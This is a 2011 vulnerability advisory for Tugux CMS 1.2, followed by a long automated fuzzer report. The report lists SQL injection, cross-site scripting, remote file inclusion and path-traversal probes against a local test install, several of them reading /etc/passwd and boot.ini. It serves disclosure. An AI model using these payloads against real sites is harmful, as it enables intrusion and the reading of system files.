Tugux CMS 1.2 Multiple Remote Vulnerabilities



EKU-ID: 289 CVE: OSVDB-ID:
Author: LiquidWorm Published: 2011-05-23 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


Title:
 
 Tugux CMS 1.2 Multiple Remote Vulnerabilities
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
 
Vendor:
 
 Tugux Studios
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
 
Product web page:
 
 http://www.tugux.com
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
 
Affected version:
 
 1.2
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
 
Summary:
 
 Tugux CMS is a free, open-source content Management system (CMS) and
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
application that powers the entire web.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
 
Description:
 
 The application suffers from multiple issues including: reflected
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
and stored xss, sql Injection, local file inclusion, url redirection.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Vulnerable parameters include: 'name', 'comment', 'nid', 'submit1',
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
'email', 'topic_id'.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
 
Tested on:
 
 Microsoft Windows XP Professional SP3 (EN)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 Apache 2.2.14 (Win32)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 PHP 5.3.1
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 MySQL 5.1.41
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
 
Vulnerability discovered by:
 
 Gjoko 'LiquidWorm' Krstic, Zero Science Lab
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 liquidworm * gmail * com
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
 
Advisory details:
 
 ID: ZSL-2011-5014
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5014.php
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
 
Discovery date:
 
 02.04.2011
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
 
Raw analysis report:
 
 http://www.zeroscience.mk/codes/tugux_raw_02042011.txt
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
           by PowerFuzzer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
                                                          (c) Joxy
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
Findings summary
 
MySQL Injection (nid) in http://localhost/tugux/comments.php
Vulnerable URL: http://localhost/tugux/comments.php?nid=%BF%27%22%28
XSS (nid) in http://localhost/tugux/comments.php
Vulnerable URL: http://localhost/tugux/comments.php?nid=<script>var+pf_687474703a2f2f6c6f63616c686f73742f74756775782f636f6d6d656e74732e706870_6e6964=new+Boolean();</script>
Warning include (nid) in http://localhost/tugux/latest.php
Vulnerable URL: http://localhost/tugux/latest.php?nid=http%3A%2F%2Fwww.google.com%2F
MySQL Injection (nid) in http://localhost/tugux/latest.php
Vulnerable URL: http://localhost/tugux/latest.php?nid=%BF%27%22%28
XSS (nid) in http://localhost/tugux/latest.php
Vulnerable URL: http://localhost/tugux/latest.php?nid=<script>var+pf_687474703a2f2f6c6f63616c686f73742f74756775782f6c61746573742e706870_6e6964=new+Boolean();</script>
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=on&name=on&yes=yes&company=on&email=%BF%27%22%28&subject=on
 coming fromhttp://localhost/tugux/contact.php
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=on&name=on&yes=%BF%27%22%28&company=on&email=on&subject=on
 coming fromhttp://localhost/tugux/contact.php
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=on&name=%BF%27%22%28&yes=yes&company=on&email=on&subject=on
 coming fromhttp://localhost/tugux/contact.php
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=on&name=on&yes=yes&company=%BF%27%22%28&email=on&subject=on
 coming fromhttp://localhost/tugux/contact.php
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=%BF%27%22%28&name=on&yes=yes&company=on&email=on&subject=on
 coming fromhttp://localhost/tugux/contact.php
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=on&name=on&yes=yes&company=on&email=on&subject=%BF%27%22%28
 coming fromhttp://localhost/tugux/contact.php
XSS in http://localhost/tugux/contact.php
  with params =message=on&name=on&yes=yes&company=on&email=%3Cscript%3Evar+pf_687474703a2f2f6c6f63616c686f73742f74756775782f636f6e746163742e706870_656d61696c%3Dnew+Boolean%28%29%3B%3C%2Fscript%3E&subject=on
  coming fromhttp://localhost/tugux/contact.php
XSS in http://localhost/tugux/contact.php
  with params =message=on&name=%3Cscript%3Evar+pf_687474703a2f2f6c6f63616c686f73742f74756775782f636f6e746163742e706870_6e616d65%3Dnew+Boolean%28%29%3B%3C%2Fscript%3E&yes=yes&company=on&email=on&subject=on
  coming fromhttp://localhost/tugux/contact.php
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=http%3A%2F%2Fwww.google.com%2F&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=http%3A%2F%2Fwww.google.com%2F
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=http%3A%2F%2Fwww.google.com%2F&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=http%3A%2F%2Fwww.google.com%2F&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=http%3A%2F%2Fwww.google.com%2F&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd%00&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=c%3A%5C%5Cboot.ini&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=c%3A%5C%5Cboot.ini&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=c%3A%5C%5Cboot.ini%00&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini%00&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini%00&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=c%3A%5C%5Cboot.ini%00&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
MySQL Injection in http://localhost/tugux/latest.php?nid=10
 with params =comment=%BF%27%22%28&email=on&name=on&submit1=Submit&topic_id=10
 coming fromhttp://localhost/tugux/comments.php?nid=10
MySQL Injection in http://localhost/tugux/latest.php?nid=10
 with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%BF%27%22%28
 coming fromhttp://localhost/tugux/comments.php?nid=10
MySQL Injection in http://localhost/tugux/latest.php?nid=10
 with params =comment=on&email=on&name=%BF%27%22%28&submit1=Submit&topic_id=10
 coming fromhttp://localhost/tugux/comments.php?nid=10
MySQL Injection in http://localhost/tugux/latest.php?nid=10
 with params =comment=on&email=on&name=on&submit1=%BF%27%22%28&topic_id=10
 coming fromhttp://localhost/tugux/comments.php?nid=10
MySQL Injection in http://localhost/tugux/latest.php?nid=10
 with params =comment=on&email=%BF%27%22%28&name=on&submit1=Submit&topic_id=10
 coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=http%3A%2F%2Fwww.google.com%2F&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=http%3A%2F%2Fwww.google.com%2F
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=http%3A%2F%2Fwww.google.com%2F&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=http%3A%2F%2Fwww.google.com%2F&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=http%3A%2F%2Fwww.google.com%2F&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd%00&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=c%3A%5C%5Cboot.ini&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=c%3A%5C%5Cboot.ini&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=c%3A%5C%5Cboot.ini%00&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini%00&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini%00&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=c%3A%5C%5Cboot.ini%00&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
